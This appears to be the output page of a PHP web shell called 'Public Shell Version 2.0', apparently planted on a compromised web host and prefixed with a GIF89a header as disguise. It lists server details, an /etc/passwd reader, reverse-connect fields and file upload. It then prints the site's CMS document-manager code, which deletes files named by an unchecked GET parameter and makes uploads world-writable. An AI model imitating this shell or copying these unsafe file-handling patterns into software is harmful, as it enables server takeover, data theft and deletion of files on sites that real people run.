GIF89a

Public Shell


Uname : Linux hlpi1ws-c319s07.ad.aruba.it 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
PHP Version : 5.3.29
Server Admin : postmaster@www.giancio.com
Server IP : 192.168.3.109 Your IP : 18.188.15.246
Safe Mode : Safe Mode is OFF
Read etc/passwd : Disabled Functions : PHP INFO
Back Connect
IP : PORt :
'; Public Shell Version 2.0
Disable Functions: system,popen,dl,passthru,proc_open,shell_exec
Current Path : /web/htdocs/www.giancio.com/home/admin/function/
File Upload :
Current File : /web/htdocs/www.giancio.com/home/admin/function/doc.php

<?php

////////////////////CARICAMNTO PDF

function listdoc() {
	$out = 	'<div class="row">
					<div class="col-md-6">
						<div class="headline">
							<h3>' . LISTA . ' ' . DOC . '</h3> 
						</div>
					</div>					 
					<div class="col-md-6"> 
						<a href="?azione=uploaddoc" class="btn btn-default pull-right"><i class="icon-plus"></i> Inserisci</a>
					</div>		
				</div>'; 
		

	$out .= '<div class="row">		
					<div class="col-md-12">
						<div class="table-wrapper">

				    		<div class="wrapper-panel">     
				    		<table class="table table-striped" id="tab" > 
				      			<thead>
									<tr>
									    <th>' . PATH . '</th>	 
									    <th width="5%"></th>	
									</tr>
								</thead>
				      			<tbody>';
	$img = opendir('../updoc/');
	while ($file = readdir($img)) {
		$file_array[] = $file;
	}

	foreach ($file_array as $file) {
		if ($file == ".." || $file == ".") {
			continue;
		}
		$out .= '<tr>
					<td><a href="../updoc/' . $file . '" title="' . $file . '">updoc/' . $file . '</a></td>
				<td>
					<a class="show-option" title="' . DELETE . '" href="cms.php?azione=deldoc&delete=' . $file . '" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');">
					<i class="icon-remove-sign"></i>
					</a>
					</td>
				</tr>';
		//questo crea il link
	}
	$out .= '</tbody></table>';			      							

$out .='			</div>
			    			<div class="wrapper-paging pull-right">
			      				<ul>
									<li><a class="paging-back">&lt;</a></li>
									<li><a class="paging-this">Pagina <strong>0</strong> di <span>x</span></a></li>
									<li><a class="paging-next">&gt;</a></li>
								</ul>
			    			</div>	<br /><br /> 		
	    </div>	 
	</div>
</div>';
	

	return ($out);
}

function deldoc() {
	define('IMAGE_DIR', '../updoc');
	$immagine = IMAGE_DIR . '/' . $_GET['delete'];
	if (!unlink($immagine)) {
		echo("Impossibile eliminare $immagine <br>");
	} else {
		header('location: cms.php?del&azione=listdoc');
	}
	echo("<br><a href=cms.php?azione=listdoc>Torna Indietro</a><br>");
}

function uploaddoc() { 
		global $conn, $id;
	$output = '<div class="row">
					<div class="col-md-10">
						<div class="headline">
							<h3>'.ADD.' '.DOC.'</h3>
						</div>
					</div> 
					
					<div class="col-md-2">
						<a class="btn btn-default pull-right" href="javascript:history.back()"><i class="icon-reply"></i> Torna indietro</a>
					</div>

				</div>';

	$output .= '<div class="row">
				<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=savedoc&id=' . $id . '" method="post">
					<div class="col-md-4">
						<br /><br /><input type="file" id="updoc" name="updoc" /><br /><br />
						<button class="btn btn-default" type="submit">Salva</button><br /><br />
					</div>	
				</form>
				</div>';
		

		return ($output);

}

function savedoc() {
	global $conn;
	$dimensione_massima = 102400000;
	//dimensione massima consentita per file in byte -> 1024 byte = 1 Kb
	$dimensione_massima_Kb = $dimensione_massima / 1024;
	$cartella_upload = "../updoc/";
	//cartella in cui eseguire l'upload (controllare permessi scrittura)
	// percorso cartella relativo $cartella_upload="../public/";
	$filtrare = 1;
	//filtrare x estensioni ammesse? 1=si 0=no
	$array_estensioni_ammesse = array('.pdf', '.doc', '.xls', '.docx', '.xlsx', '.ppt', '.jpg', '.png', '.gif', '.bmp', '.ai', '.eps', '.jpeg', '.mp3', '.mp4');
	//estensioni ammesse

	if (!isset($_FILES['updoc']) || $_FILES['updoc']['size'] == 0) {
		$errore = '' . ERRNOFILE . '';
		header('location: cms.php?errnofile&azione=uploaddoc');
	} elseif ($_FILES['updoc']['size'] > $dimensione_massima) {
		$errore = '' . ERRDIM2 . '';
		header('location: cms.php?errdim2&azione=uploaddoc');
	} else {
		$nome_file = $_FILES['updoc']['name'];
		$errore = "";
		if ($filtrare == 1) {
			$estensione = strtolower(substr($nome_file, strrpos($nome_file, "."), strlen($nome_file) - strrpos($nome_file, ".")));
			if (!in_array($estensione, $array_estensioni_ammesse)) {
				$errore = '' . ERREXT2 . '';
				header('location: cms.php?errext_doc&azione=uploaddoc');
			}
		}
		if (!file_exists($cartella_upload)) {
			$errore .= "La cartella di destinazione non esiste</br>";
		}

		if ($errore == "") {
			if (move_uploaded_file($_FILES['updoc']['tmp_name'], $cartella_upload . $_FILES['updoc']['name'])) {
				chmod(/*$cartella_upload . */$_FILES['updoc']['name'], 0777);
				//permessi per poterci sovrascrivere/scaricare

				header('location: cms.php?ins&azione=listdoc');
			} else {
				echo "error";
			}
		} else {
			echo $errore;
		}
	}

}
?>

Public Shell Version 2.0